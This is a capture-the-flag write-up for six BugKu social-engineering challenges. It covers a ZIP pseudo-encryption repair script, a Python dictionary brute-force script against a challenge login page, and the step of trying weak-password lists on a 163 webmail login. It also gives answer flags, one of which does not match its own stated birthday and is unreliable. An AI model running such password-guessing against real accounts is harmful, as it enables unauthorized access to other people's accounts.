BugKu Social Engineering
This is the 9th day of my participation in the August Wen Challenge.
1. Password
Name: Zhang San; birthday: 19970315; KEY format: KEY{XXXXXXXXXX}
Analysis: zs plus the birthday will do.
Answer: the flag {zs199970315}
2. Information search
It is said that bugku.cn can be found on Jinri Toutiao. Tip: the flag is the group number, format KEY{XXXXXXXXXXX}
Analysis: search Baidu directly.
Answer: the KEY {462713425}
3. Simple personal information collection
1.zip
Analysis:
First try brute-forcing the password, then consider ZIP pseudo-encryption. Pseudo-encryption cracking tool:
After removing the pseudo-encryption, the archive opens:
The social engineering website is down.
Answer: the flag {15206164164}
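Added example (not from the original post or any tool it links to): ZIP pseudo-encryption means the "encrypted" bit of the general purpose flag is set in a header although the file data was never encrypted. The Python below parses the central directory, clears that bit, and keeps the change only when the member's CRC-32 then verifies; the function names, the in-memory sample archive and the UTF-8 file-name assumption are mine.

```python
import io
import struct
import zipfile
import zlib

ENCRYPTED = 0x01  # bit 0 of the general purpose bit flag (low byte)


def entries(data):
    """Walk the central directory: yield (name, central flag offset, local flag offset)."""
    eocd = data.rfind(b"PK\x05\x06")  # end of central directory record
    total, _size, pos = struct.unpack_from("<HII", data, eocd + 10)
    for _ in range(total):
        nlen, xlen, clen, _d, _ia, _ea, local = struct.unpack_from("<HHHHHII", data, pos + 28)
        name = data[pos + 46:pos + 46 + nlen].decode("utf-8")  # assumes UTF-8 names
        yield name, pos + 8, local + 6
        pos += 46 + nlen + xlen + clen


def clear_pseudo_encryption(data):
    """Return (repaired archive, names whose encryption flag was fake)."""
    patched = bytearray(data)
    flagged = [e for e in entries(data) if (data[e[1]] | data[e[2]]) & ENCRYPTED]
    for _name, c_off, l_off in flagged:
        patched[c_off] &= 0xFE
        patched[l_off] &= 0xFE
    fake = []
    with zipfile.ZipFile(io.BytesIO(bytes(patched))) as z:
        for name, c_off, l_off in flagged:
            try:
                z.read(name)  # CRC-32 matches only if the data was never encrypted
                fake.append(name)
            except (zipfile.BadZipFile, zlib.error, NotImplementedError):
                # Really encrypted: put the original flag bytes back.
                patched[c_off], patched[l_off] = data[c_off], data[l_off]
    return bytes(patched), fake


def make_sample():
    """Constructed sample: a plain ZIP with the flag set in the central directory only."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("flag.txt", "constructed sample\n")
    data = bytearray(buf.getvalue())
    data[next(entries(data))[1]] |= ENCRYPTED
    return bytes(data)


if __name__ == "__main__":
    print(clear_pseudo_encryption(make_sample())[1])  # ['flag.txt']
```

A member that is genuinely encrypted fails the CRC check after the bit is cleared, so its flag is restored and it is not reported.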
4. Advanced social engineering
Problem statement:
Analysis: search Baidu Tieba for "solitary long away".
The email account should allow a weak-password login. Look up a weak-password list and try the entries one by one on the 163 mail login: a123456
Answer: the KEY {sg1H78Si9C0s99Q}
5. Wang Xiaoming’s diary
Analysis:
Note the following information: Bugku online tool
The tool used is: online password attack
Use the online password attack tool to generate a dictionary:
This gives a dictionary.
Then brute-force it with the Python script:
```python
import re

import requests

URL = 'http://120.24.86.145:8002/xiaoming/?yes'
# Text the page returns for a wrong password; it must match the server's response.
WRONG = 'Password incorrect, please re-enter'


def req(pwd):
    """Submit one candidate; return the failure-message matches (empty if accepted)."""
    s = requests.session()
    r = s.get(URL)
    r.encoding = 'utf-8'
    response = s.post(URL, data={'pwd': pwd})
    response.encoding = 'utf-8'
    return re.findall(re.escape(WRONG), response.text)


def zidian():
    """Load the generated dictionary, one candidate per line."""
    with open('mima.txt', 'r', encoding='UTF-8') as f:
        return f.read().splitlines()


for pwd in zidian():
    # No failure message in the response means this candidate was accepted.
    if not req(pwd):
        print(pwd)
        break
```
```
python3.5 crack.py WXM
```
Password: WXM
Answer: Flag {bugku-shegong_xMQ}
6. Simple social engineering attempt
Analysis: findneo.github.io/180406bugku…
References: github.com/bugku weibo.com/bugku c.bugku.com/13211.txt
Answer: the flag {BUku_open_shgcx1}